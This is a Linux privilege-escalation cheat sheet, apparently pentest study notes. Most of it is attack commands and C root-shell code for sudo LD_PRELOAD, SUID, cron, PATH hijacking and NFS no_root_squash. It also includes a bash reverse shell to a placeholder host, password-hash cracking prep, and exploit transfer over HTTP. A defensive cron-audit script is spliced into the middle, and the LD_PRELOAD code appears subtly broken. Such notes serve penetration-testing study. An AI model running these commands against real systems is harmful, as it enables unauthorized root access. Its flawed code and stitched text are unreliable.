🐧Linux Privilege Escalation
Enumeration
# Print hostname
hostname
# Kernel information
uname -a
# Kernel version (alternative source)
cat /proc/version
# OS / distribution identification banner
cat /etc/issue
# Processes
ps
# Env variables
env
# List sudo commands
sudo -l
# Listening sockets and the processes that own them
netstat -tulpn

Kernel Exploits
The Kernel exploit methodology is simple:
Identify the kernel version
Search and find an exploit code for the kernel version of the target system
Run the exploit
You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.
# python 2
python -m SimpleHTTPServer 8000
# python 3
python -m http.server 8000

Sudo
The steps of this privilege escalation vector can be summarized as follows:
Run sudo -l
Check for LD_PRELOAD (with the env_keep option)
Write a simple C code compiled as a shared object (.so extension) file
Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
# This C code spawns a root shell
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setuid(0);               /* take uid 0 (only succeeds when already running with root privileges) */
    setgid(0);
    system("/bin/bash -p");  /* -p keeps the elevated privileges instead of dropping them */
    return 0;
}
# Compile the code as a shared object
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run the program
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

SUID
# List files that have the SUID bit set (use -perm /6000 to match SUID or SGID)
find / -type f -perm -04000 -ls 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
# Use unshadow to create a file crackable by John The Ripper
unshadow passwd.txt shadow.txt > passwords.txt

Capabilities
# Get capabilities and redirect errors
getcap -r / 2>/dev/null

Cron Jobs
Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:
System administrators need to run a script at regular intervals.
They create a cron job to do this
After a while, the script becomes useless, and they delete it
They do not clean the relevant cron job
Two points to note:
The command syntax will vary depending on the available tools (e.g. nc will probably not support the -e option you may have seen used in other cases).
We should always prefer to start reverse shells, as we do not want to compromise the system integrity during a real penetration testing engagement.
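A defender's check for the stale-cron-job scenario just described, added here as an example (not part of the original notes): it parses system-crontab lines and reports root jobs whose script has been deleted or is editable by non-root users. The sample crontab and the fake filesystem table are constructed; `audit_crontab` takes a `lookup` callback so the check runs offline in this form and against a real host through `os.stat` by default.

```python
import os
import re
import stat

# Constructed sample of /etc/crontab content (not taken from a real host).
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *  * * * root run-parts --report /etc/cron.hourly
*/5 * * * * root /home/user/backup.sh
0 3   * * * root /opt/scripts/cleanup.sh > /dev/null 2>&1
"""
# System crontab layout: five schedule fields, the user, then the command.
JOB_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")

def parse_system_crontab(text):
    """Return (schedule, user, command) tuples; comments and VAR=value lines are skipped."""
    jobs = []
    for line in (raw.strip() for raw in text.splitlines()):
        if line and not line.startswith("#") and not re.match(r"^\w+=", line):
            match = JOB_RE.match(line)
            if match:
                jobs.append(match.groups())
    return jobs

def first_path_in_command(command):
    """The first absolute path in the command, i.e. the script the job runs, or None."""
    return next((tok for tok in command.split() if tok.startswith("/")), None)

def real_lookup(path):
    """(mode, uid) of an existing path, or None; symlinks are followed, as cron would."""
    st = os.stat(path) if os.path.exists(path) else None
    return (st.st_mode, st.st_uid) if st else None

def audit_job(command, lookup=real_lookup):
    """'missing': script deleted but job kept (the scenario above); 'writable': world-writable
    or not root-owned, so a low-privileged user can edit it; 'unknown': no path; else 'ok'."""
    path = first_path_in_command(command)
    if path is None:
        return "unknown"
    info = lookup(path)
    if info is None:
        return "missing"
    mode, uid = info
    if mode & stat.S_IWOTH or uid != 0:
        return "writable"
    return "ok"

def audit_crontab(text, lookup=real_lookup):
    return [(user, cmd, audit_job(cmd, lookup)) for _, user, cmd in parse_system_crontab(text)]
```

Any job reported as "missing" or "writable" and scheduled as root is exactly the leftover that the scenario above turns into a privilege escalation path, so the fix is to delete the job or restore the script with root ownership and no write access for others.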
# Show cron jobs
cat /etc/crontab
# spawn a shell
bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1
# run listener on attacking machine
nc -nlvp xxxx

Path
This vector depends entirely on the existing configuration of the target system, so be sure you can answer the questions below before trying it.
What folders are located under $PATH
Does your current user have write privileges for any of these folders?
Can you modify $PATH?
Is there a script/application you can start that will be affected by this vulnerability?
# This code tries to launch a system binary called "thm"
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    system("thm");   /* "thm" is resolved through $PATH, which is what makes the vector work */
    return 0;
}
# search for writable folders
find / -writable 2>/dev/null
# search alternative
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
#compare the previous results with PATH
echo $PATH
# Add /tmp to PATH
export PATH=/tmp:$PATH
# Make sure the compiled program ("script" here stands for the binary built from script.c, not the source) is executable, has 777 permissions and the SUID bit set
chmod 777 script
chmod +x script
chmod +s script

NFS
The critical element for this privilege escalation vector is the no_root_squash option. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the no_root_squash option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.
# Print NFS configuration
cat /etc/exports
# Enumerate mountable shares from the attacking machine
showmount -e x.x.x.x
# mount the share
mkdir /tmp/target_shares
mount -o rw x.x.x.x:/share_name /tmp/target_shares
# Compile the nfs script
gcc nfs.c -o nfs -w
# Set permissions (before adding SUID: a numeric chmod replaces the whole mode and would clear the bit)
chmod 777 nfs
# Set SUID
chmod +s nfs
# Execute script on the target machine (should get a root shell)
./nfs
# nfs.c: the script runs bash on the target machine
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}